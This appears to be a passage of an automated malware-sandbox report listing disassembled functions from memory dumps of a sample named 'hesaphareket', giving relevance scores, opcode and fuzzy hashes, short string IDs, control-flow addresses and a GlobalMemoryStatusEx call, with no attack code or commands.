                                                    Function 02BE9C78 Relevance: 2.8, Instructions: 2788COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9efad908440aef404de1f4718a7f53641b3232e8fd3d0b5c8eb90b65b1de24c4
                                                    • Instruction ID: 0113f1b9ac3c7bf00cc6b3f75726101c741ceebc4a38babe0c458cd8139f7ed8
                                                    • Opcode Fuzzy Hash: 9efad908440aef404de1f4718a7f53641b3232e8fd3d0b5c8eb90b65b1de24c4
                                                    • Instruction Fuzzy Hash: F153F831C10B1A8ACB51EF68C880699F7B1FF99310F11D79AE4597B121EB70AAD5CF81
                                                    Function 02BE9C73 Relevance: 1.6, Instructions: 1576COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c9a93dc8daeb749d64f8b49de42ca786cad8f0818f75ad0400064e5a343c8d19
                                                    • Instruction ID: 8d935d1ea45ec927d4afa81f28150b3b33c830e22b37c3c0bf39df71acd609b5
                                                    • Opcode Fuzzy Hash: c9a93dc8daeb749d64f8b49de42ca786cad8f0818f75ad0400064e5a343c8d19
                                                    • Instruction Fuzzy Hash: 84F2E631D10B1A8ACB50EB68C8806A9F7B1FF99310F11D79AE45977121FB70AAD5CF81
                                                    Function 02BE3E48 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \VXm
                                                    • API String ID: 0-2312107965
                                                    • Opcode ID: 58142a430b58efb96b9a93ac93a376f9b6e3b24dec5aa741d47f2004d1c07711
                                                    • Instruction ID: 78aff4a903041c2fba5da8571b99ce6c7d3f841fbec0f09c540f3396bed08b03
                                                    • Opcode Fuzzy Hash: 58142a430b58efb96b9a93ac93a376f9b6e3b24dec5aa741d47f2004d1c07711
                                                    • Instruction Fuzzy Hash: 9D917F70E00209DFDF10DFA9C9957ADBBF2EF88314F148169E416A7294DB749845CF91
                                                    Function 02BE4A60 Relevance: .3, Instructions: 266COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 55eaaebca4a31c123fb3147008a283d22d68556e971b5636032673bcc493698c
                                                    • Instruction ID: 4123056dbfff740ea1418a3061e3e9263a559d2c1f95c07886f1a8c233d881f5
                                                    • Opcode Fuzzy Hash: 55eaaebca4a31c123fb3147008a283d22d68556e971b5636032673bcc493698c
                                                    • Instruction Fuzzy Hash: 7EB16C70E00209CFDF14CFA9D9857AEBBF2EF88314F148569D41AAB394EB749845CB91
                                                    Function 02BE47D8 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1468 2be47d8-2be4864 1471 2be48ae-2be48b0 1468->1471 1472 2be4866-2be4871 1468->1472 1473 2be48b2-2be48ca 1471->1473 1472->1471 1474 2be4873-2be487f 1472->1474 1481 2be48cc-2be48d7 1473->1481 1482 2be4914-2be4916 1473->1482 1475 2be48a2-2be48ac 1474->1475 1476 2be4881-2be488b 1474->1476 1475->1473 1478 2be488f-2be489e 1476->1478 1479 2be488d 1476->1479 1478->1478 1480 2be48a0 1478->1480 1479->1478 1480->1475 1481->1482 1483 2be48d9-2be48e5 1481->1483 1484 2be4918-2be495d 1482->1484 1485 2be4908-2be4912 1483->1485 1486 2be48e7-2be48f1 1483->1486 1492 2be4963-2be4971 1484->1492 1485->1484 1488 2be48f5-2be4904 1486->1488 1489 2be48f3 1486->1489 1488->1488 1490 2be4906 1488->1490 1489->1488 1490->1485 1493 2be497a-2be49d7 1492->1493 1494 2be4973-2be4979 1492->1494 1501 2be49d9-2be49dd 1493->1501 1502 2be49e7-2be49eb 1493->1502 1494->1493 1501->1502 1503 2be49df-2be49e2 call 2be0ab8 1501->1503 1504 2be49ed-2be49f1 1502->1504 1505 2be49fb-2be49ff 1502->1505 1503->1502 1504->1505 1507 2be49f3-2be49f6 call 2be0ab8 1504->1507 1508 2be4a0f-2be4a13 1505->1508 1509 2be4a01-2be4a05 1505->1509 1507->1505 1512 2be4a15-2be4a19 1508->1512 1513 2be4a23 1508->1513 1509->1508 1511 2be4a07 1509->1511 1511->1508 1512->1513 1514 2be4a1b 1512->1514 1515 2be4a24 1513->1515 1514->1513 1515->1515
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \VXm$\VXm
                                                    • API String ID: 0-3652994748
                                                    • Opcode ID: c2f50e77926a1ba32554af53378c864aadd1cc49483ae4293fc1b46ed2d0347f
                                                    • Instruction ID: 2f2ad7e9e4a7147d3b3c8e504f4c17ba44c2350d14fc675791212542da5adf8b
                                                    • Opcode Fuzzy Hash: c2f50e77926a1ba32554af53378c864aadd1cc49483ae4293fc1b46ed2d0347f
                                                    • Instruction Fuzzy Hash: FE7139B0E002499FDF14DFA9C8857AEBBF2FF88314F148169E41AA7254EB749845CF91
                                                    Function 02BE47D7 Relevance: 2.7, Strings: 2, Instructions: 176COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1516 2be47d7-2be4864 1519 2be48ae-2be48b0 1516->1519 1520 2be4866-2be4871 1516->1520 1521 2be48b2-2be48ca 1519->1521 1520->1519 1522 2be4873-2be487f 1520->1522 1529 2be48cc-2be48d7 1521->1529 1530 2be4914-2be4916 1521->1530 1523 2be48a2-2be48ac 1522->1523 1524 2be4881-2be488b 1522->1524 1523->1521 1526 2be488f-2be489e 1524->1526 1527 2be488d 1524->1527 1526->1526 1528 2be48a0 1526->1528 1527->1526 1528->1523 1529->1530 1531 2be48d9-2be48e5 1529->1531 1532 2be4918-2be492a 1530->1532 1533 2be4908-2be4912 1531->1533 1534 2be48e7-2be48f1 1531->1534 1539 2be4931-2be495d 1532->1539 1533->1532 1536 2be48f5-2be4904 1534->1536 1537 2be48f3 1534->1537 1536->1536 1538 2be4906 1536->1538 1537->1536 1538->1533 1540 2be4963-2be4971 1539->1540 1541 2be497a-2be49d7 1540->1541 1542 2be4973-2be4979 1540->1542 1549 2be49d9-2be49dd 1541->1549 1550 2be49e7-2be49eb 1541->1550 1542->1541 1549->1550 1551 2be49df-2be49e2 call 2be0ab8 1549->1551 1552 2be49ed-2be49f1 1550->1552 1553 2be49fb-2be49ff 1550->1553 1551->1550 1552->1553 1555 2be49f3-2be49f6 call 2be0ab8 1552->1555 1556 2be4a0f-2be4a13 1553->1556 1557 2be4a01-2be4a05 1553->1557 1555->1553 1560 2be4a15-2be4a19 1556->1560 1561 2be4a23 1556->1561 1557->1556 1559 2be4a07 1557->1559 1559->1556 1560->1561 1562 2be4a1b 1560->1562 1563 2be4a24 1561->1563 1562->1561 1563->1563
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \VXm$\VXm
                                                    • API String ID: 0-3652994748
                                                    • Opcode ID: 94e7a89639ab06876f8becab9e1595ee1b3806b6a78cd70e230876ee3d7dad06
                                                    • Instruction ID: 5af2acd803af949ca819290d68068e4fcf7a1ec49ae07393995de62fd7bf894a
                                                    • Opcode Fuzzy Hash: 94e7a89639ab06876f8becab9e1595ee1b3806b6a78cd70e230876ee3d7dad06
                                                    • Instruction Fuzzy Hash: EC7147B0E002498FDF14DFA9C8857AEBBF1FF88314F148169E41AA7254DB749846CF91
                                                    Function 0624E098 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3775888254.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6240000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d05afeac052d11c79f687a65b282659471fd714f42138c860d342b5e7d2768e3
                                                    • Instruction ID: e120d826785d8ff0c0b8dac0f6a541e277530f2e630a36b023e4747c998bda76
                                                    • Opcode Fuzzy Hash: d05afeac052d11c79f687a65b282659471fd714f42138c860d342b5e7d2768e3
                                                    • Instruction Fuzzy Hash: 6E410272E103598FCB04DF69D8447EEBBF5AF89210F15866AD818A7350EB74A845CBE0
                                                    Function 0624D254 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0624E0EA), ref: 0624E1D7
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3775888254.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6240000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemoryStatus
                                                    • String ID:
                                                    • API String ID: 1890195054-0
                                                    • Opcode ID: 3986961a857dcbc0cd313e9deffe7d8f26de12d63419d371081e47c8dc190a3f
                                                    • Instruction ID: 99dec2e62d62e7dabe9b9ea49bf8fc0f3ffd88027ccac9845f4b8f117cf18ac3
                                                    • Opcode Fuzzy Hash: 3986961a857dcbc0cd313e9deffe7d8f26de12d63419d371081e47c8dc190a3f
                                                    • Instruction Fuzzy Hash: C41114B1C106599BDB14DFAAC445BEEFBF4BB48310F11816AE818B7240D378A944CFE5
                                                    Function 0624E168 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0624E0EA), ref: 0624E1D7
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3775888254.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_6240000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemoryStatus
                                                    • String ID:
                                                    • API String ID: 1890195054-0
                                                    • Opcode ID: a0c9ba32fc8b19a8da5704063004b6355718bbef676a7bbac0e1eca5db400386
                                                    • Instruction ID: 82378f296da8351999f32d325fd89845d56f7ea1fe8b309e3fc07f7eb587bd49
                                                    • Opcode Fuzzy Hash: a0c9ba32fc8b19a8da5704063004b6355718bbef676a7bbac0e1eca5db400386
                                                    • Instruction Fuzzy Hash: E71114B1C002599BCB10DF9AD845BDEFBF4BB48320F15816AE818B7250D378A944CFA5
                                                    Function 02BE3E3F Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \VXm
                                                    • API String ID: 0-2312107965
                                                    • Opcode ID: 36df7334f52b4fc645d529724b5d2d27067edb50c14803206b7571a03eaf5a3e
                                                    • Instruction ID: c866922a3bfc97281cf5b4e4dbf8ecbf4ce54fa8f1b42e35f02af9c5b64b741f
                                                    • Opcode Fuzzy Hash: 36df7334f52b4fc645d529724b5d2d27067edb50c14803206b7571a03eaf5a3e
                                                    • Instruction Fuzzy Hash: 3E915C70E002099FDF20DFA9C9957EDBBF1EF48314F148169E41AA7294DB749886CB92
                                                    Function 02BEF463 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PH_q
                                                    • API String ID: 0-2397113591
                                                    • Opcode ID: 93b34a5ab53e7becb8ae57cfce7eba815458103a3cbe0f2ce213eb5d29108ab4
                                                    • Instruction ID: 390ed3390ad516a9629c23c709c54e733c0f245bb659f5ba4b7e92c9e620b946
                                                    • Opcode Fuzzy Hash: 93b34a5ab53e7becb8ae57cfce7eba815458103a3cbe0f2ce213eb5d29108ab4
                                                    • Instruction Fuzzy Hash: 8C319A31B002019FDB19AB7495647AE7BE2EF88244F2444A9E407DB396EF39DC06CB90
                                                    Function 02BEF470 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: PH_q
                                                    • API String ID: 0-2397113591
                                                    • Opcode ID: 080baff2d961699fd5d43806da2809d52b5ee0e0defe7882b5bb0a7a4da055f9
                                                    • Instruction ID: 53a2518751c40fd0d7b75d6f7c45ecf8eaf25c56d241d02dbf3f92562bde9721
                                                    • Opcode Fuzzy Hash: 080baff2d961699fd5d43806da2809d52b5ee0e0defe7882b5bb0a7a4da055f9
                                                    • Instruction Fuzzy Hash: B3319A30B002059FDB18AB34D55476E7BE2EF88644F2444A9E407DB396DF39DC02CB91
                                                    Function 02BE6F48 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LR_q
                                                    • API String ID: 0-2241839734
                                                    • Opcode ID: ae861876cc207189c32bbac76ce15faff66d7c3890ac490f003531a0a37d8522
                                                    • Instruction ID: fc32e79be8c7d0c6f6d176e6dbf29d5186e9675821efdba735c962c919ee3181
                                                    • Opcode Fuzzy Hash: ae861876cc207189c32bbac76ce15faff66d7c3890ac490f003531a0a37d8522
                                                    • Instruction Fuzzy Hash: 87316F70E102199BDF24CFA5C85079EF7B5FF45314F20896AE506EB241EBB5E846CB82
                                                    Function 02BE6F43 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LR_q
                                                    • API String ID: 0-2241839734
                                                    • Opcode ID: 5c522f8f61a5d9e20fd2c4085a33d5d0d1c313bbf2a6cf1f10ceac12174dfe5e
                                                    • Instruction ID: 97d6876b3f2b8643670a8d5fed47145c86e6dad6f3aa415bd83b76d3d2a55764
                                                    • Opcode Fuzzy Hash: 5c522f8f61a5d9e20fd2c4085a33d5d0d1c313bbf2a6cf1f10ceac12174dfe5e
                                                    • Instruction Fuzzy Hash: 66318470E102199FDF25CFA5C85079EBBB5FF55304F208969E406EB241EBB5E846CB82
                                                    Function 02BEF5F8 Relevance: .7, Instructions: 688COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 497564badc292f7a7dbb978cf3e0eee5932f96fbb8aa97e3716e190a7f7afda5
                                                    • Instruction ID: 28f05aa5d79197d9273e0cc554d0d538066bd73462fb497c6ba71043e408e0e9
                                                    • Opcode Fuzzy Hash: 497564badc292f7a7dbb978cf3e0eee5932f96fbb8aa97e3716e190a7f7afda5
                                                    • Instruction Fuzzy Hash: EF522634A00204CFDB24DB68C584BADBBF2FF49314F6484A9E45AAB761DB35ED85CB50
                                                    Function 02BE7993 Relevance: .6, Instructions: 553COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7bdfa80aee3231abde559aa642d30b72c8ce3987cf8fd34cb173651944a82e2a
                                                    • Instruction ID: 16013cc6bcf1dc7299431259d0ba568bca2cb7dc30c226845ff3d0f635b5418c
                                                    • Opcode Fuzzy Hash: 7bdfa80aee3231abde559aa642d30b72c8ce3987cf8fd34cb173651944a82e2a
                                                    • Instruction Fuzzy Hash: CA126D307401169BCB25BB38E89536D77A2FF85348B508E39E006CB769CF75EC4A9B91
                                                    Function 02BE9400 Relevance: .3, Instructions: 259COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 56e7e3f87940378b779d9fed585cea922f9f6dc87e89c477a8fb06771ac3eac7
                                                    • Instruction ID: f70ecde6256333ae18d429859cef3be7863ec94c14cdfbb5225cbd38f12719f2
                                                    • Opcode Fuzzy Hash: 56e7e3f87940378b779d9fed585cea922f9f6dc87e89c477a8fb06771ac3eac7
                                                    • Instruction Fuzzy Hash: 52A13934A046049FCF18DF68D995AADBBF2EF88314F1484A9E806E7364DB35EC46CB50
                                                    Function 02BE4A5B Relevance: .3, Instructions: 258COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8c7a2225a6bec7f15544ee1810320ecfd0a597cc7b0d0f7a2ab690123c8d1efe
                                                    • Instruction ID: 12be4f1b0dc1afd390a55f997605a4050c8910257d53d162be928b0f5824d0e7
                                                    • Opcode Fuzzy Hash: 8c7a2225a6bec7f15544ee1810320ecfd0a597cc7b0d0f7a2ab690123c8d1efe
                                                    • Instruction Fuzzy Hash: 0AA13C70E00209CFDF10DFA9D98579DBBF2EF48318F148669D41AAB354EB749845CB91
                                                    Function 02BECF00 Relevance: .3, Instructions: 257COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 54db4f0ebcf1370e58561215bcdb02fe98d9c34f19834f3825b40afaa47d6668
                                                    • Instruction ID: cba46e62d57dce1b5194ba6a7561d7eaff3ead5eb35fa372aea9b4d277f6b705
                                                    • Opcode Fuzzy Hash: 54db4f0ebcf1370e58561215bcdb02fe98d9c34f19834f3825b40afaa47d6668
                                                    • Instruction Fuzzy Hash: ED919471B002169FDB15DB28C880B2EB7B6FB84314F1585AAE41ADB355CB35EC86C7D1
                                                    Function 02BE93EC Relevance: .2, Instructions: 239COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e4fa371eb27942b45c4b0c7602094258e4f0c91fc4bbff869c393d706c10b445
                                                    • Instruction ID: ca3af530bb2c1abd17c8f5075fcf045976f2a4af0ac3379a29370c7f40334d3f
                                                    • Opcode Fuzzy Hash: e4fa371eb27942b45c4b0c7602094258e4f0c91fc4bbff869c393d706c10b445
                                                    • Instruction Fuzzy Hash: 90914A35A046049FCF18DFA8D985AADBBF2EF88314F1484A5E806D7365DB34AD49CB90
                                                    Function 02BE9768 Relevance: .1, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d4cc594c9c5dffc781bbe8c0ad438bffd7b6d84f4d1b0499ad3c72c902d10ff5
                                                    • Instruction ID: c099c01446dbb5971fec430a7cf28c9daebb00cac9f7f15ab3bf529ca348a6e9
                                                    • Opcode Fuzzy Hash: d4cc594c9c5dffc781bbe8c0ad438bffd7b6d84f4d1b0499ad3c72c902d10ff5
                                                    • Instruction Fuzzy Hash: 5741A430F0060A8BDF24DEA9D98176EB7B6FB85354F20486AD41AD7390D735EC49C782
                                                    Function 02BE9918 Relevance: .1, Instructions: 137COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ce81eaebb0f7dc613dc4af78754b9a950d9af83609552bc5d29aad48b4e56226
                                                    • Instruction ID: 24ddb950dbeec6e26df1daee96019ae69129cbcf01d4982d8f59a7a68df8608f
                                                    • Opcode Fuzzy Hash: ce81eaebb0f7dc613dc4af78754b9a950d9af83609552bc5d29aad48b4e56226
                                                    • Instruction Fuzzy Hash: B1514975A002058FDF04CF69E984799FBB1FF88310F14C1AAE9099B356EB709949CB90
                                                    Function 02BE6CB8 Relevance: .1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 166f5645567daea6d1acb44eebdd61fdae28549b7d8e6a6f2a38b48eb01242ee
                                                    • Instruction ID: 70b7f5a5338abbbbaedbbeaf295e5e6832f6f3ffa14d2ed507501712006332c7
                                                    • Opcode Fuzzy Hash: 166f5645567daea6d1acb44eebdd61fdae28549b7d8e6a6f2a38b48eb01242ee
                                                    • Instruction Fuzzy Hash: E1510270D002188FDF18DFA9C884B9DBBB5FF48314F548169E81ABB394DB74A844CB95
                                                    Function 02BE6CB7 Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6baa92c3ecf8208193c845362c1756a34419b091c2745da1c4eddbd8b4de569a
                                                    • Instruction ID: 59f98fc5c22f6a5de7363da3b6bfd0171fc77be907598eec8659ed0fac223002
                                                    • Opcode Fuzzy Hash: 6baa92c3ecf8208193c845362c1756a34419b091c2745da1c4eddbd8b4de569a
                                                    • Instruction Fuzzy Hash: CB510270D002188FDF18DFA9C884B9DBBB5FF58314F548169E81ABB294D774A844CF91
                                                    Function 02BE1128 Relevance: .1, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f1fa318e264ceaed3a9845cd7b1a3062d702cf4d2bcfc8c76726799ba2922210
                                                    • Instruction ID: 59527aebe4285cddc76d83a3ac2b33840a7e34e66676d175e8cb43c56c7d443a
                                                    • Opcode Fuzzy Hash: f1fa318e264ceaed3a9845cd7b1a3062d702cf4d2bcfc8c76726799ba2922210
                                                    • Instruction Fuzzy Hash: 8351EE312529968FC716FB2CFEA2B597B65FB973093044969E001CB63DD7702D09DB50
                                                    Function 02BE1138 Relevance: .1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a27c0662c204c9a5ecad49b79fce0c2456d96b19797d1f48ef3f30ccdce33e38
                                                    • Instruction ID: 50ed54e53b9713b7be024f19c8bd4c09b0c4ad6ebce5af92f7f2d687dc151465
                                                    • Opcode Fuzzy Hash: a27c0662c204c9a5ecad49b79fce0c2456d96b19797d1f48ef3f30ccdce33e38
                                                    • Instruction Fuzzy Hash: EB41DC302429A68FC706FB2CFE92B593B65FB9230A3044969E001CB63DDB706D09DB90
                                                    Function 02BEF321 Relevance: .1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_2be0000_hesaphareket.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5a1c992aadca5c7677a456ea083d3ed52675e848709b67b9edadb8f828949373
                                                    • Instruction ID: 90cfcd549b54334d8c7ee05c08fb23d82453493edb4c6ebdeb082bade233ed59
                                                    • Opcode Fuzzy Hash: 5a1c992aadca5c7677a456ea083d3ed52675e848709b67b9edadb8f828949373
                                                    • Instruction Fuzzy Hash: 34316B30A0420A9FDF19DF65D8956AEBBB2FF89300F14C569E806E7764DB70AC46CB50
                                                    Function 02BE505F Relevance: .1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.3772177837.0000000002BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BE0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
